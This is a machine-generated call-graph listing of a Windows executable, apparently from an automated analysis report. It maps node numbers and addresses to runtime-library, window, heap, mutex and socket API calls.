143888->143890 143914 6bf334d2 143888->143914 143919 6bf330ca 114 API calls ctype 143888->143919 143920 6befb0e4 143888->143920 143889->143835 143890->143875 143890->143876 143890->143878 143890->143880 143890->143883 143923 6bf330ca 114 API calls ctype 143890->143923 143892 6bf35ef3 143891->143892 143893 6bf35ee4 143891->143893 143895 6bf35f3a 143892->143895 143898 6bf35f1f CreateThread 143892->143898 144041 6bf37acd 143893->144041 144052 6bf34191 143895->144052 143897 6bf35f43 GetTickCount 143899 6beeb9b7 143897->143899 143898->143897 144083 6bf35999 175 API calls 143898->144083 143900 6beeb9c9 143899->143900 143901 6beeb9c2 143899->143901 143900->143901 143925 6bf2c674 143914->143925 143917 6bf33505 143917->143888 143919->143888 143937 6befac4d 143920->143937 143923->143890 143924->143889 143926 6bf2c685 ctype 143925->143926 143932 6bf2c5df GetTickCount SendMessageW GetTickCount 143926->143932 143929 6bf2fea4 143930 6bf2feb2 listen 143929->143930 143931 6bf2feaa 143929->143931 143930->143917 143931->143930 143933 6bf2c62c 143932->143933 143934 6bf2c60f 143932->143934 143933->143917 143933->143929 143936 6bf23fed 111 API calls 3 library calls 143934->143936 143936->143933 143938 6befac5f GetTickCount 143937->143938 143939 6befac90 143937->143939 143949 6bf3b76f 67 API calls __getptd 143938->143949 143946 6bf3b781 143939->143946 143942 6befac8f 143942->143939 143950 6bf3f185 143946->143950 143949->143942 143955 6bf3f10c GetLastError 143950->143955 143970 6bf3ef97 TlsGetValue 143955->143970 143971 6bf3efc7 143970->143971 143972 6bf3efac 143970->143972 144043 6bf37ae7 144041->144043 144042 6bf2c674 114 API calls 144042->144043 144043->144042 144044 6bf37b25 144043->144044 144047 6bf37b23 144043->144047 144057 6bf2405e 111 API calls 3 library calls 144043->144057 144046 6bf23f7c ctype 111 API calls 144044->144046 144046->144047 144058 6bf2ff58 setsockopt 144047->144058 144060 6bf33a64 144052->144060 144057->144043 144061 6bf23f7c ctype 111 API calls 144060->144061 146041 6bf32709 _memset 146040->146041 146050 6bf31cca 146041->146050 146051 6bf31ce0 _memset 146050->146051 146052 6befac4d 68 API calls 146051->146052 146053 6bf31d12 146051->146053 146052->146051 146054 6bf31f26 146053->146054 146097 6bf31d5d htons 146054->146097 146056 6bf31f51 146098 6bf31d7c _memcpy_s 146097->146098 146098->146056 146124 6cd3d558 146125 6cd3d563 146124->146125 146126 6cd3d562 146124->146126 146127 6cd3d573 FindNextFileW 146125->146127 146128 6cd3d56f 146125->146128 146129 b9f4b2 146130 b9f4be _setlocale 146129->146130 146131 b9f4f6 146130->146131 146132 b9f4d6 146130->146132 146139 b9f4eb _setlocale 146130->146139 146142 bad28b 146131->146142 146157 b998d1 67 API calls __getptd_noexit 146132->146157 146135 b9f4db 146158 b9a5b1 6 API calls 2 library calls 146135->146158 146143 bad2bf EnterCriticalSection 146142->146143 146144 bad29d 146142->146144 146146 b9f4fe 146143->146146 146144->146143 146145 bad2a5 146144->146145 146160 ba339f 146145->146160 146148 b9f350 146146->146148 146149 b9f383 146148->146149 146152 b9f362 146148->146152 146159 b9f52a LeaveCriticalSection LeaveCriticalSection _vprintf_helper 146149->146159 146150 b9f36e 146175 b998d1 67 API calls __getptd_noexit 146150->146175 146152->146149 146152->146150 146155 b9f3a1 _setlocale 146152->146155 146153 b9f373 146176 b9a5b1 6 API calls 2 library calls 146153->146176 146155->146149 146169 bb158a 146155->146169 146157->146135 146159->146139 146161 ba33c7 EnterCriticalSection 146160->146161 146162 ba33b4 146160->146162 146161->146146 146167 ba32dc 67 API calls 8 library calls 146162->146167 146164 ba33ba 146164->146161 146168 b97051 67 API calls 3 library calls 146164->146168 146166 ba33c6 146166->146161 146167->146164 146168->146166 146170 bb1599 146169->146170 146171 bb15ae 146169->146171 146177 b998d1 67 API calls __getptd_noexit 146170->146177 146171->146155 146173 bb159e 146178 b9a5b1 6 API calls 2 library calls 146173->146178 146175->146153 146177->146173 146179 6bf2ff7e 146180 6bf300c9 146179->146180 146181 6bf2ffa8 GetWindowLongW 146179->146181 146183 6bf3018f 146180->146183 146187 6bf300d4 146180->146187 146182 6bf2ffb5 DefWindowProcW 146181->146182 146191 6bf2ffbf 146181->146191 146190 6bf2ffc6 ctype 146182->146190 146183->146182 146185 6bf3019a GetWindowLongW 146183->146185 146185->146182 146197 6bf301b3 _memset 146185->146197 146186 6bf384d6 _strlwr_s_l_stat 5 API calls 146188 6bf3029d 146186->146188 146187->146190 146210 6bf30dc4 WSAGetLastError WSASetLastError 146187->146210 146190->146186 146191->146190 146192 6bf30086 146191->146192 146193 6bf30006 146191->146193 146202 6bf300a7 146192->146202 146208 6bf2fec7 ioctlsocket 146192->146208 146193->146190 146207 6bf2fec7 ioctlsocket 146193->146207 146196 6bf3005f 146196->146190 146200 6bf30063 WSAGetLastError 146196->146200 146197->146190 146201 6bf30226 htons 146197->146201 146198 6bf3009b 146198->146202 146203 6bf3009f WSAGetLastError 146198->146203 146200->146190 146204 6bf30247 moneypunct 146201->146204 146202->146190 146209 6bf30dc4 WSAGetLastError WSASetLastError 146202->146209 146203->146202 146204->146190 146205 6bf30262 GetLastError 146204->146205 146205->146190 146206 6bf30275 GetLastError 146205->146206 146206->146190 146207->146196 146208->146198 146209->146190 146210->146190 146211 b85637 146225 b95454 146211->146225 146213 b85643 GetDC 146226 b8548f 146213->146226 146216 b8566e 146218 b85697 146216->146218 146231 b1c8e0 146216->146231 146217 b8565e EnumFontFamiliesW 146217->146216 146220 b1c8e0 std::_String_base::_Xlen 69 API calls 146218->146220 146222 b856aa 146218->146222 146220->146222 146221 b856bd ReleaseDC CreateFontW 146224 b856ed std::locale::_Init 146221->146224 146222->146221 146223 b1c8e0 std::_String_base::_Xlen 69 API calls 146222->146223 146223->146221 146225->146213 146238 b94550 146226->146238 146228 b854ba GetVersionExW 146229 b94647 __except1 5 API calls 146228->146229 146230 b854e2 146229->146230 146230->146216 146230->146217 146232 b1c8f6 146231->146232 146233 b1c8e9 146231->146233 146241 b1cc80 69 API calls 3 library calls 146232->146241 146240 b1cc80 69 API calls 3 library calls 146233->146240 146235 b1c8f2 146235->146218 146237 b1c917 146237->146218 146239 b9455c __VEC_memzero 146238->146239 146239->146228 146240->146235 146241->146237 146242 b62322 146245 b62167 146242->146245 146244 b62346 146246 b62179 146245->146246 146259 b6219a 146245->146259 146247 b621b6 146246->146247 146248 b62181 146246->146248 146249 b621dc 146247->146249 146250 b621bd 146247->146250 146275 b620a9 146248->146275 146251 b621e3 146249->146251 146252 b621f1 146249->146252 146310 b61458 IsWindow IsWindowVisible PostMessageW InvalidateRect 146250->146310 146301 b61513 IsWindow 146251->146301 146254 b62217 146252->146254 146255 b621f8 146252->146255 146257 b62240 146254->146257 146258 b6221e 146254->146258 146305 b614af IsWindow 146255->146305 146262 b62247 146257->146262 146263 b62269 146257->146263 146311 b6156b InvalidateRect 146258->146311 146259->146244 146260 b621da 146260->146259 146312 b61304 _TrackMouseEvent 146262->146312 146265 b62270 146263->146265 146269 b62292 146263->146269 146313 b6158c InvalidateRect 146265->146313 146271 b622dc 146269->146271 146314 b615b4 IsWindowEnabled LoadCursorW SetCursor 146269->146314 146273 b622f9 146271->146273 146315 b61894 InvalidateRect 146271->146315 146273->146259 146316 b618a4 InvalidateRect 146273->146316 146276 b620b8 __EH_prolog3_GS 146275->146276 146317 b47451 146276->146317 146280 b620f8 146323 b56537 GetWindowRect 146280->146323 146302 b61554 InvalidateRect 146301->146302 146303 b61535 PostMessageW 146301->146303 146304 b61568 146302->146304 146303->146302 146304->146259 146306 b614cd IsWindowEnabled 146305->146306 146307 b614f9 InvalidateRect 146305->146307 146306->146307 146308 b614da PostMessageW 146306->146308 146309 b6150f 146307->146309 146308->146307 146309->146259 146310->146260 146311->146259 146312->146259 146313->146259 146314->146269 146315->146273 146316->146259 146318 b47474 GetClientRect 146317->146318 146319 b47469 BeginPaint 146317->146319 146320 b47323 CreateCompatibleDC 146318->146320 146319->146318 146371 b46393 CreateCompatibleBitmap 146320->146371 146322 b4736a SelectObject SetViewportOrgEx 146322->146280 146324 b56560 146323->146324 146371->146322 146438 b363aa 146439 b363b6 __EH_prolog3_catch 146438->146439 146442 b35ab7 146439->146442 146579 b94d50 146442->146579 146445 b35b22 146446 b35b3a GetCurrentDirectoryW 146445->146446 146447 b35b63 _wcscat _wcscpy 146446->146447 146581 b34494 8 API calls 3 library calls 146447->146581 146449 b35bdd 146582 b348f2 GetCurrentThreadId RaiseException __EH_prolog3 std::locale::_Init 146449->146582 146451 b35bec 146583 b34c96 GetCurrentThreadId RaiseException __EH_prolog3 std::locale::_Init 146451->146583 146453 b35bfb 146584 b34d5b GetCurrentThreadId RaiseException __EH_prolog3 std::locale::_Init 146453->146584 146580 b35ac9 GetWindowsDirectoryW 146579->146580 146580->146445 146581->146449 146582->146451 146583->146453 146639 b33ca8 146642 b98c13 146639->146642 146641 b33cc3 146643 b98c1f _setlocale 146642->146643 146644 b98c42 146643->146644 146645 b98c27 146643->146645 146647 b98c50 146644->146647 146650 b98c91 146644->146650 146741 b998e4 67 API calls __getptd_noexit 146645->146741 146743 b998e4 67 API calls __getptd_noexit 146647->146743 146648 b98c2c 146742 b998d1 67 API calls __getptd_noexit 146648->146742 146653 b98c9e 146650->146653 146654 b98cb2 146650->146654 146652 b98c55 146744 b998d1 67 API calls __getptd_noexit 146652->146744 146746 b998e4 67 API calls __getptd_noexit 146653->146746 146662 b98cdb 146654->146662 146663 b98cc5 146654->146663 146655 b98c34 _setlocale 146655->146641 146657 b98c5c 146745 b9a5b1 6 API calls 2 library calls 146657->146745 146659 b98ca3 146747 b998d1 67 API calls __getptd_noexit 146659->146747 146748 b998d1 67 API calls __getptd_noexit 146662->146748 146670 b98651 146663->146670 146666 b98ce0 146749 b998e4 67 API calls __getptd_noexit 146666->146749 146668 b98cd3 146750 b98d06 LeaveCriticalSection __unlock_fhandle 146668->146750 146671 b98688 146670->146671 146672 b9866d 146670->146672 146673 b98697 146671->146673 146675 b986be 146671->146675 146751 b998e4 67 API calls __getptd_noexit 146672->146751 146753 b998e4 67 API calls __getptd_noexit 146673->146753 146680 b986dd 146675->146680 146692 b986f1 146675->146692 146677 b98672 146752 b998d1 67 API calls __getptd_noexit 146677->146752 146679 b9869c 146754 b998d1 67 API calls __getptd_noexit 146679->146754 146756 b998e4 67 API calls __getptd_noexit 146680->146756 146681 b9867a 146681->146668 146682 b98749 146758 b998e4 67 API calls __getptd_noexit 146682->146758 146685 b986a3 146687 b986e2 146757 b998d1 67 API calls __getptd_noexit 146687->146757 146689 b9874e 146692->146681 146692->146682 146694 b98725 146692->146694 146696 b9876a 146692->146696 146694->146682 146698 b98730 ReadFile 146694->146698 146761 ba0596 67 API calls _malloc 146696->146761 146702 b9885c 146698->146702 146703 b98bd7 GetLastError 146698->146703 146701 b98780 146702->146703 146741->146648 146742->146655 146743->146652 146744->146657 146746->146659 146747->146657 146748->146666 146749->146668 146750->146655 146751->146677 146752->146681 146753->146679 146754->146685 146756->146687 146758->146689 146761->146701 146788 b6a5ad 146803 b95421 146788->146803 146790 b6a5b9 GetParent ShowWindow 146804 b6a3b3 GetClientRect 146790->146804 146803->146790 146818 b69cbe 146804->146818 146819 b69ccf 146818->146819 146824 b3ee0d 146819->146824 146836 b3e84d 146824->146836 146827 b656bd 146860 b277af 146827->146860 146830 b656d3 SetLastError 146831 b656df 146837 b3e85f 146836->146837 146838 b3e8dd 146836->146838 146837->146838 146839 b3e87c EnterCriticalSection 146837->146839 146838->146827 146840 b3e897 146839->146840 146854 b3e971 146839->146854 146841 b3e905 LoadCursorW 146840->146841 146842 b3e89e GetClassInfoExW 146840->146842 146845 b3e8e4 146841->146845 146844 b3e8c3 GetClassInfoExW 146842->146844 146842->146845 146843 b283c2 LeaveCriticalSection 146843->146838 146844->146845 146847 b3e8d5 146844->146847 146848 b3e943 GetClassInfoExW 146845->146848 146858 b3d630 67 API calls swprintf 146845->146858 146855 b283c2 146847->146855 146851 b3e968 146848->146851 146848->146854 146852 b3e93d 146852->146848 146854->146843 146858->146852 146861 b277c2 146860->146861 146862 b277b7 146860->146862 146874 b27774 GetCurrentProcess FlushInstructionCache 146861->146874 146873 b8fcad 16 API calls 146862->146873 146865 b277bc 146865->146861 146866 b277d1 146865->146866 146866->146830 146866->146831 146873->146865 146874->146866 146904 b61e2d 146905 b61e39 __EH_prolog3 146904->146905 146906 b1ba90 std::_String_base::_Xlen 2 API calls 146905->146906 146907 b61e48 146906->146907 146908 b1cf00 std::_String_base::_Xlen 69 API calls 146907->146908 146909 b61e57 GetWindowTextW 146908->146909 146910 b2d354 2 API calls 146909->146910 146911 b61e6d GetDC GetWindowRect 146910->146911 146912 b61eb1 146911->146912 146913 b61ef2 SetWindowPos 146912->146913 146914 b61f0d std::locale::_Init ctype 146913->146914 146915 6cd3f84d 146918 6cd7ae0a 146915->146918 146917 6cd3f855 146919 6cd7ae16 __EH_prolog3 146918->146919 146928 6cdddf34 146919->146928 146921 6cd7ae41 146922 6cdddf34 ctype 18 API calls 146921->146922 146924 6cd7ae68 146922->146924 146923 6cdddf34 ctype 18 API calls 146925 6cd7ae8f 146923->146925 146924->146923 146926 6cdddf34 ctype 18 API calls 146925->146926 146927 6cd7aeb6 numpunct 146926->146927 146927->146917 146930 6cdddf3e 146928->146930 146929 6cddd47e _malloc 3 API calls 146929->146930 146930->146929 146931 6cdddf58 146930->146931 146932 6cdddf5a 146930->146932 146931->146921 146933 6cdddf68 std::bad_alloc::bad_alloc 146932->146933 146935 6cdddf80 146932->146935 146937 6cdde46f 13 API calls ctype 146933->146937 146936 6cdddf8a __CxxThrowException 146935->146936 146937->146935 146938 6cd5c24a 146939 6cd5c257 146938->146939 146940 6cd5c25c GetCurrentThreadId 146938->146940 146940->146939 146941 6cd5c26b 146940->146941 146941->146939 146943 6cd5bd5f 146941->146943 146944 6cd5bd70 146943->146944 146947 6cd34d0b 146944->146947 146948 6cd34d1d 146947->146948 146949 6cd34d21 SetLastError 146948->146949 146951 6cd34d2d 146948->146951 146950 6cd34d29 146949->146950 146950->146939 146951->146950 146952 6cd34d64 CreateWindowExW 146951->146952 146952->146950 146953 b19990 GetCurrentProcessId 146978 b195f0 146953->146978 146956 b19acf 146960 b94647 __except1 5 API calls 146956->146960 146957 b19a1f GetLastError 146958 b19a35 146957->146958 146959 b19a2c WaitForSingleObject 146957->146959 146982 b19740 GetProcessHeap HeapLock HeapWalk HeapWalk HeapUnlock 146958->146982 146959->146958 146962 b19aef 146960->146962 146963 b19a41 146964 b19a45 146963->146964 146965 b19a4c 146963->146965 146967 b19ab0 ReleaseMutex 146964->146967 146983 b19fa0 GetProcessHeap HeapAlloc 146965->146983 146967->146956 146968 b19ac8 CloseHandle 146967->146968 146968->146956 146969 b19a51 146970 b19a62 146969->146970 146984 b19de0 TlsAlloc RaiseException _memset __CxxThrowException@8 146969->146984 146972 b19a84 146970->146972 146985 b94656 RaiseException 146970->146985 146986 b19830 GetProcessHeap HeapAlloc 146972->146986 146979 b195f6 146978->146979 146980 b1961f CreateMutexW 146979->146980 146988 b97908 77 API calls __vsnwprintf_l 146979->146988 146980->146956 146980->146957 146982->146963 146983->146969 146984->146970 146985->146972 146988->146980 146989 6bf04d51 146994 6bf04d5e _memset __write_nolock 146989->146994 146990 6bf384d6 _strlwr_s_l_stat 5 API calls 146991 6bf04df8 146990->146991 146992 6bf04dbf 146993 6bf04dd4 ctype 146992->146993 146995 6bf03ac3 193 API calls 146992->146995 146993->146990 146994->146992 146994->146993 146996 6bf02447 108 API calls 146994->146996 146995->146993 146997 6bf04db1 146996->146997 146999 6bf03ac3 146997->146999 147000 6bf03ae7 __EH_prolog3 146999->147000 147037 6bf1bfae 147000->147037 147038 6bf1bfba __EH_prolog3 ctype 147037->147038 147127 6bee765f GetTickCount 147038->147127 147040 6bf1c050 147128 6bee765f GetTickCount 147040->147128 147042 6bf1c05b 147129 6bee765f GetTickCount 147042->147129 147044 6bf1c066 147130 6bee765f GetTickCount 147044->147130 147127->147040 147128->147042 147129->147044 147392 6bf330d6 147393 6bf330e8 _memset __write_nolock 147392->147393 147397 6bf33135 147393->147397 147398 6bf2fcc6 147393->147398 147394 6bf384d6 _strlwr_s_l_stat 5 API calls 147395 6bf33163 147394->147395 147397->147394 147399 6bf2fce2 recvfrom 147398->147399 147400 6bf2fccf 147398->147400 147399->147400 147400->147397 147401 b8531f 147404 b9ea8c 147401->147404 147405 b9eabc 147404->147405 147406 b9eaa0 147404->147406 147425 ba4c42 TlsGetValue 147405->147425 147460 b998d1 67 API calls __getptd_noexit 147406->147460 147409 b9eaa5 147461 b9a5b1 6 API calls 2 library calls 147409->147461 147413 b8533f 147415 b9eb20 147416 b949fc _realloc 67 API calls 147415->147416 147418 b9eb26 147416->147418 147418->147413 147462 b998f7 67 API calls 3 library calls 147418->147462 147426 b9eac2 147425->147426 147427 ba4c57 147425->147427 147430 ba05db 147426->147430 147463 ba4ba7 6 API calls __crt_waiting_on_module_handle 147427->147463 147429 ba4c62 TlsSetValue 147429->147426 147432 ba05e4 147430->147432 147433 b9eace 147432->147433 147434 ba0602 Sleep 147432->147434 147464 bb13b0 147432->147464 147433->147415 147436 ba4e30 147433->147436 147435 ba0617 147434->147435 147435->147432 147435->147433 147482 ba4db7 GetLastError 147436->147482 147438 ba4e38 147439 b9eadb 147438->147439 147497 b97051 67 API calls 3 library calls 147438->147497 147460->147409 147462->147413 147463->147429 147465 bb13bc _setlocale 147464->147465 147466 bb13d4 147465->147466 147470 bb13f3 _memset 147465->147470 147477 b998d1 67 API calls __getptd_noexit 147466->147477 147468 bb13d9 147478 b9a5b1 6 API calls 2 library calls 147468->147478 147469 bb1465 RtlAllocateHeap 147469->147470 147470->147469 147473 ba339f __lock 66 API calls 147470->147473 147474 bb13e9 _setlocale 147470->147474 147479 ba410c 5 API calls 2 library calls 147470->147479 147480 bb14ac LeaveCriticalSection _doexit 147470->147480 147481 ba5437 6 API calls __decode_pointer 147470->147481 147473->147470 147474->147432 147477->147468 147479->147470 147480->147470 147481->147470 147483 ba4c42 ___set_flsgetvalue 8 API calls 147482->147483 147484 ba4dce 147483->147484 147485 ba4e24 SetLastError 147484->147485 147486 ba05db __calloc_crt 64 API calls 147484->147486 147485->147438 147487 ba4de2 147486->147487 147487->147485 147488 ba4dea 147487->147488 147497->147439 147556 6bf3dadb 147557 6bf3dae6 147556->147557 147558 6bf3daeb 147556->147558 147570 6bf484e1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 147557->147570 147562 6bf3d9e5 147558->147562 147561 6bf3daf9 147563 6bf3d9f1 _raise 147562->147563 147565 6bf3da8e _raise 147563->147565 147568 6bf3da3e ___DllMainCRTStartup 147563->147568 147571 6bf3d8b0 147563->147571 147565->147561 147566 6bf3da6e 147566->147565 147567 6bf3d8b0 __CRT_INIT@12 156 API calls 147566->147567 147567->147565 147568->147565 147568->147566 147569 6bf3d8b0 __CRT_INIT@12 156 API calls 147568->147569 147569->147566 147570->147558 147572 6bf3d93b 147571->147572 147573 6bf3d8bf 147571->147573 147574 6bf3d972 147572->147574 147576 6bf3d941 147572->147576 147618 6bf4041e HeapCreate 147573->147618 147577 6bf3d9d0 147574->147577 147578 6bf3d977 147574->147578 147580 6bf3d95c 147576->147580 147588 6bf3d8ca 147576->147588 147732 6bf40778 67 API calls _doexit 147576->147732 147577->147588 147737 6bf3f2ce 79 API calls 2 library calls 147577->147737 147581 6bf3ef97 ___set_flsgetvalue 8 API calls 147578->147581 147580->147588 147733 6bf47fdd 68 API calls __read_nolock 147580->147733 147585 6bf3d97c 147581->147585 147589 6bf42ec2 __calloc_crt 67 API calls 147585->147589 147586 6bf3d8d6 __RTC_Initialize 147588->147568 147590 6bf3d988 147589->147590 147590->147588 147595 6bf3eefc __decode_pointer 6 API calls 147590->147595 147592 6bf3d966 147734 6bf3efe8 70 API calls 2 library calls 147592->147734 147598 6bf3d9a6 147595->147598 147597 6bf3d96b 147735 6bf4044e VirtualFree HeapFree HeapFree HeapDestroy 147597->147735 147619 6bf3d8c5 147618->147619 147619->147588 147620 6bf3f33c GetModuleHandleW 147619->147620 147621 6bf3f350 147620->147621 147622 6bf3f357 147620->147622 147738 6bf404c2 Sleep GetModuleHandleW 147621->147738 147624 6bf3f361 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 147622->147624 147625 6bf3f4bf 147622->147625 147627 6bf3f3aa TlsAlloc 147624->147627 147741 6bf3efe8 70 API calls 2 library calls 147625->147741 147626 6bf3f356 147626->147622 147630 6bf3f4c4 147627->147630 147631 6bf3f3f8 TlsSetValue 147627->147631 147630->147586 147631->147630 147632 6bf3f409 147631->147632 147732->147580 147733->147592 147734->147597 147735->147588 147737->147588 147738->147626 147741->147630 147766 6bf305da 147769 6bf30345 147766->147769 147770 6bf3034f 147769->147770 147771 6bf303a2 closesocket 147770->147771 147772 6bf3036e ctype 147770->147772 147773 6bf303a9 moneypunct ctype 147770->147773 147771->147773 147776 6bf30380 WSAAsyncSelect shutdown 147772->147776 147774 6bf303d7 WSACancelAsyncRequest 147773->147774 147775 6bf303de 147773->147775 147774->147775 147779 6bf2c70a 76 API calls ctype 147776->147779 147778 6bf303a0 147778->147773 147779->147778 147780 b4869e 147785 b486c2 _memset __EH_prolog3 147780->147785 147781 b48753 IsDialogMessageW 147782 b48738 ctype 147781->147782 147783 b94647 __except1 5 API calls 147782->147783 147784 b48778 147783->147784 147785->147781 147785->147782 147786 b486fd GetClassNameW 147785->147786 147787 b1b680 78 API calls 147786->147787 147788 b4871d 147787->147788 147789 b48734 ctype 147788->147789 147791 b27fa1 81 API calls 2 library calls 147788->147791 147789->147781 147789->147782 147791->147789 147792 b48119 147794 b4812e 147792->147794 147793 b48136 147794->147793 147795 b48150 GetClientRect 147794->147795 147796 b4817f 147794->147796 147795->147796 147809 b47cd1 147796->147809 147799 b47cd1 6 API calls 147800 b481aa 147799->147800 147813 b4687c 147800->147813 147804 b481b6 147805 b4687c 6 API calls 147804->147805 147806 b4820e 147804->147806 147807 b481df ShowWindow 147804->147807 147817 b46850 147804->147817 147828 b468c4 6 API calls ctype 147804->147828 147805->147804 147806->147793 147823 b465ca 147806->147823 147807->147804 147811 b47ce5 147809->147811 147812 b47cf4 147811->147812 147829 b9a5d7 6 API calls __vswprintf_s_l 147811->147829 147812->147799 147814 b4688a 147813->147814 147816 b46893 147814->147816 147830 b9a5d7 6 API calls __vswprintf_s_l 147814->147830 147816->147804 147818 b4685e 147817->147818 147819 b46859 147817->147819 147821 b46877 147818->147821 147832 b9a5d7 6 API calls __vswprintf_s_l 147818->147832 147831 b9a5d7 6 API calls __vswprintf_s_l 147819->147831 147821->147804 147824 b46625 147823->147824 147825 b465de GetClientRect InvalidateRect 147823->147825 147824->147793 147828->147804 147829->147812 147830->147816 147831->147818 147832->147821 147846 b1e300 147849 b1e230 147846->147849 147848 b1e32e 147850 b1e240 _memset 147849->147850 147859 b12770 CreateFileW 147850->147859 147852 b1e2ab 147853 b1e2e1 147852->147853 147855 b1e2bf 147852->147855 147854 b94647 __except1 5 API calls 147853->147854 147856 b1e2f2 147854->147856 147857 b94647 __except1 5 API calls 147855->147857 147856->147848 147858 b1e2dd 147857->147858 147858->147848 147860 b12791 147859->147860 147861 b127b5 147859->147861 147914 b18150 92 API calls 147860->147914 147868 b12860 147861->147868 147864 b127c5 147865 b127ae 147865->147852 147869 b128b8 _memset 147868->147869 147872 b128f1 147869->147872 147940 b95674 147869->147940 147898 b1299d 147872->147898 147915 b15690 147872->147915 147873 b129c3 SetLastError 147874 b129cb 147873->147874 147874->147872 147876 b129d7 147874->147876 147958 b18150 92 API calls 147876->147958 147877 b12b4a 147878 b94647 __except1 5 API calls 147877->147878 147883 b12b60 147878->147883 147881 b949fc _realloc 67 API calls 147884 b12b39 147881->147884 147882 b949fc _realloc 67 API calls 147882->147877 147883->147864 147884->147877 147884->147882 147898->147881 147898->147884 147914->147865 147916 b95674 _malloc 67 API calls 147915->147916 147917 b156a1 147916->147917 147918 b156d2 147917->147918 147919 b156ac SetLastError 147917->147919 147966 b14680 147918->147966 148029 b18150 92 API calls 147919->148029 147923 b156c5 147941 b95727 147940->147941 147951 b95686 147940->147951 148117 ba5437 6 API calls __decode_pointer 147941->148117 147943 b9572d 148118 b998d1 67 API calls __getptd_noexit 147943->148118 147948 b956e3 RtlAllocateHeap 147948->147951 147949 b95697 147949->147951 148110 ba5630 67 API calls 2 library calls 147949->148110 148111 ba545f 67 API calls 7 library calls 147949->148111 148112 b970a5 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 147949->148112 147951->147948 147951->147949 147952 b95713 147951->147952 147955 b95718 147951->147955 147957 b129ba 147951->147957 148113 b955ab 67 API calls 4 library calls 147951->148113 148114 ba5437 6 API calls __decode_pointer 147951->148114 148115 b998d1 67 API calls __getptd_noexit 147952->148115 148116 b998d1 67 API calls __getptd_noexit 147955->148116 147957->147873 147957->147874 147958->147898 147967 b94550 _memset 147966->147967 148029->147923 148110->147949 148111->147949 148113->147951 148114->147951 148115->147955 148116->147957 148117->147943 148118->147957 148119 6cd26ee0 GetCurrentProcessId 148141 6cd26c60 148119->148141 148122 6cd2703a 148123 6cd26f6e GetLastError 148124 6cd26f84 148123->148124 148125 6cd26f7b WaitForSingleObject 148123->148125 148145 6cd26cd0 GetProcessHeap HeapLock HeapWalk HeapWalk HeapUnlock 148124->148145 148125->148124 148127 6cd26f8c 148128 6cd26f90 148127->148128 148129 6cd26f9a GetProcessHeap 148127->148129 148130 6cd2701b ReleaseMutex 148128->148130 148131 6cd26fa6 HeapAlloc 148129->148131 148132 6cd26fb5 148129->148132 148130->148122 148133 6cd27033 CloseHandle 148130->148133 148131->148132 148134 6cd26fd7 __CxxThrowException 148132->148134 148135 6cd26fec 148132->148135 148136 6cd26fc7 148132->148136 148133->148122 148134->148135 148146 6cd26da0 GetProcessHeap HeapAlloc 148135->148146 148136->148132 148138 6cd26ffa 148139 6cd27001 __CxxThrowException 148138->148139 148140 6cd27016 148138->148140 148139->148140 148140->148130 148142 6cd26c66 148141->148142 148143 6cd26c77 _vswprintf_s 148142->148143 148144 6cd26c96 CreateMutexW 148142->148144 148143->148144 148144->148122 148144->148123 148145->148127 148146->148138 148147 6cd9a86a 148148 6cd9a876 __EH_prolog3 148147->148148 148161 6cdaa916 lstrlenW __EH_prolog3 numpunct 148148->148161 148150 6cd9a966 148162 6cdaa916 lstrlenW __EH_prolog3 numpunct 148150->148162 148152 6cd9a9b3 148163 6cdaa916 lstrlenW __EH_prolog3 numpunct 148152->148163 148154 6cd9aa28 148164 6cd2ac1f lstrlenW 148154->148164 148156 6cd9aa35 148165 6cdaa916 lstrlenW __EH_prolog3 numpunct 148156->148165 148158 6cd9aa73 148166 6cdaa916 lstrlenW __EH_prolog3 numpunct 148158->148166 148160 6cd9aac1 numpunct 148161->148150 148162->148152 148163->148154 148164->148156 148165->148158 148166->148160 148167 6bf11f45 148178 6bf0e53f 148167->148178 148169 6bf11f58 148170 6bf11f61 GetTickCount GetTickCount 148169->148170 148175 6bf11f5d 148169->148175 148171 6bf11fa0 148170->148171 148177 6bf11fb7 148170->148177 148180 6bf0e54b __EH_prolog3_catch ctype 148178->148180 148181 6bf0e5ed CreateWaitableTimerW 148180->148181 148211 6bf3848a RaiseException 148180->148211 148182 6bf0e600 GetLastError 148181->148182 148183 6bf0e616 SetWaitableTimer 148181->148183 148182->148180 148184 6bf0e632 GetLastError 148183->148184 148185 6bf0e648 CreateMutexW 148183->148185 148184->148180 148186 6bf0e658 GetLastError 148185->148186 148187 6bf0e66e CreateSemaphoreW 148185->148187 148186->148180 148188 6bf0e685 GetLastError 148187->148188 148189 6bf0e69b CreateSemaphoreW 148187->148189 148188->148189 148190 6bf0e6c0 CreateEventW 148189->148190 148191 6bf0e6aa GetLastError 148189->148191 148192 6bf0e6d5 GetLastError 148190->148192 148193 6bf0e6eb CreateEventW 148190->148193 148191->148190 148192->148193 148194 6bf0e6fa GetLastError 148193->148194 148195 6bf0e710 std::runtime_error::runtime_error 148193->148195 148194->148195 148195->148169 148211->148180 148212 6bf1c2c7 148213 6bf1c2d3 148212->148213 148215 6bf1c2e6 148212->148215 148228 6bf17556 148213->148228 148216 6bf1c348 WSAGetLastError WSAGetLastError 148215->148216 148221 6bf1c2e1 148215->148221 148217 6bf1c367 148216->148217 148220 6bf1c383 148216->148220 148218 6bf1c372 WSAGetLastError 148217->148218 148217->148221 148219 6bf17556 138 API calls 148218->148219 148219->148221 148220->148221 148222 6bf1c3af 148220->148222 148224 6bf1c3be 148220->148224 148248 6bf1b526 179 API calls 5 library calls 148222->148248 148224->148221 148225 6bf1c3e4 GetTickCount GetTickCount 148224->148225 148226 6bf1c3b8 148224->148226 148225->148221 148226->148224 148249 6bf1a47f 144 API calls ctype 148226->148249 148229 6bf17562 __EH_prolog3 148228->148229 148250 6bf16afb 148229->148250 148232 6bf1758b 148233 6bf175ae LeaveCriticalSection 148232->148233 148254 6bf2db1d 114 API calls ctype 148232->148254 148235 6bf175bf 148233->148235 148255 6bf16ef2 GetTickCount 148235->148255 148237 6bf175c8 148256 6bf0e9ed 121 API calls 148237->148256 148239 6bf17601 148248->148226 148249->148225 148251 6bf16b05 148250->148251 148252 6bf16b0b EnterCriticalSection 148251->148252 148253 6bf16b21 GetTickCount 148251->148253 148252->148232 148253->148252 148254->148233 148255->148237 148256->148239 148286 6bf0fe46 148359 6befaf8a GetFileAttributesW 148286->148359 148289 6bf10250 148361 6bf04c30 148289->148361 148291 6bf04c30 75 API calls 148292 6bf0fe72 148291->148292 148295 6befaf8a GetFileAttributesW 148292->148295 148297 6bf0fe9e 